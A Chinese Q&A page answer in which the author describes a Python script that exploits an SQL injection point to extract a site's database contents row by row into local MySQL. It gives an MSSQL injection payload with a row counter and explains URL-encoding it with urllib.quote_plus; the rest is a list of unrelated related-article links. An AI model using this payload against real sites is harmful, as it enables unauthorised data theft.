展开全部

今天写了个脚本 主要就是实现利用SQLInj点直接把数据获取到本地62616964757a686964616fe58685e5aeb931333363383462并存到Mysql数据库中

学过Python的都知道可以使用urllib2中的request()方法直接打开Url，但仅限于url后没有跟复杂的参数串

今天我利用的Url是

' and (select top 1 cast(CONTENT as varchar(8000)) from xxx.dbo.xxx where cast(CONTENT as varchar) not in (select top 22 cast(CONTENT as varchar) from xxx.dbo.xxx))=0--

开始我也直接用以下语句测试的：

url="上面的URL"

req=urllib2.Request(url)

urllib2.urlopen(req)

可是执行后一直提示500错误，由此可以发现应该是Python在对Url进行编码的时候更改了某些特殊字符造成Url失效

我们可以用urllib2或urllib的quote()方法控制对特殊字符的URL编码,这里推荐用 urllib下的quote_plus()方法，它将空格转化成'+'而非%20通用性更好。

我们更改后的代码如下:

url = "' and (select top 1 cast(CONTENT as varchar(8000)) from xxx.dbo.xxx where cast(CONTENT as varchar) not in (select top "+str(count)+" cast(CONTENT as varchar) from xxx.dbo.xxx))=0--"

quoteUrl=urllib.quote_plus(url,safe=':\'/?&=()')

fd = urllib.urlopen(quoteUrl)

这样我们就可以正常的提取数据了

本回答由提问者推荐

已赞过

已踩过<

你对这个回答的评价是？

评论

收起

python网址太长_python中url太长怎么解决相关推荐

1. python算法和数据结构_Python中的数据结构和算法

   python算法和数据结构 To 至 Leonardo da Vinci 达芬奇(Leonardo da Vinci) 介绍 (Introduction) The purpose of this ar ...

2. python数据库模糊查询_python中数据库like模糊查询方式

   python中数据库like模糊查询方式 在Python中%是一个格式化字符,所以如果需要使用%则需要写成%%. 将在Python中执行的sql语句改为: sql = "SELECT * F ...

3. python编写ATM类_Python中编写类的各种技巧和方法

   有关 Python 内编写类的各种技巧和方法(构建和初始化.重载操作符.类描述.属性访问控制.自定义序列.反射机制.可调用对象.上下文管理.构建描述符对象.Pickling).你可以把它当作一个教程, ...

4. python基础知识测试题_Python中的单元测试—基础知识

   python基础知识测试题 Unit testing is the number one skill which separates people who just finished their de ...

5. python方法之间加点_python中技巧

   1.使用xpath从html文档得到其中元素: 123we为了得到其中的123we元素 tree=html.fromstring(***.text) tt=list(set(tree.xpath(&q ...

6. python求回文_python实现求最长回文子串长度

   给定一个字符串,求它最长的回文子串长度,例如输入字符串'35534321',它的最长回文子串是'3553',所以返回4. 最容易想到的办法是枚举出所有的子串,然后一一判断是否为回文串,返回最长的回文子 ...

7. python首行缩进_python中缩进

   初识Python 初识Python 跟学习所有的编程语言一样,首先得了解这门语言的编程风格和最基础的语法.下面就让我们一起来了解一下Python的编程风格. 1.逻辑行与物理行 在Python中有逻辑 ...

8. python决策树 多分类_Python中的决策树分类：您需要了解的一切

   python决策树 多分类 什么是决策树? (What is Decision Tree?) A decision tree is a decision support tool that uses ...

9. python里的非_python中逻辑非

   广告关闭 腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元! python逻辑运算的简介以及使用~ 逻辑运算在程序开发中,通常 在判断条件时, ...

最新文章

1. bert模型简介、transformers中bert模型源码阅读、分类任务实战和难点总结
2. html源码加密ensure-china_php源码加密方法详解
3. 我遇到的JPA中事务回滚的问题
4. springmvc ajax返回数据中文乱码
5. Python3 高级用法
6. 性能优化之雅虎35条军规
7. EQMX+Nginx集群搭建
8. Mirth Connect 互联互通 第四章 通用资格服务实现
9. 无人机的电调及其工作原理是什么？
10. HTML5 常见问题 font标签设置字体未生效
11. oracle 数值加减乘除
12. Android8.0替换默认静态壁纸
13. IE浏览器将于明年6月“退役”，程序员和IE的爱恨情仇终结了
14. 销毁铸造均衡Token的分析 - Helium
15. GD32F303的PWM实现LED呼吸灯的方法
16. Pandas中resample方法详解
17. mysql 加盐_【mysql】当加盐算法需要改变，数据库该如何更新？
18. 威锋VL820是USB 3.1 2代集线器控制器
19. 大数据同步工具Canal
20. DicomVCL for D6-D2010-Crack

热门文章

1. Linux如何查找解压文件,linux命令(文件搜索和压缩解压命令)
2. oracle set autocommit,Oracle Sqlplus SET AUTOCOMMIT
3. 康宁玻璃ct值计算公式_防眩光玻璃的硬度及强度
4. 陕西省高等数学竞赛_关于参加“陕西高校第十二次大学生高等数学竞赛”的通知...
5. 【转】asp.net中bind()和eval()的区别
6. js 函数实参列表arguments和形参的那点事儿
7. Python新手学习基础之数据结构-序列2
8. LED 将为我闪烁： 控帘 j发光二级管
9. easyui表单提交，后台获取不到值
10. 机房收费管理系统 之 总结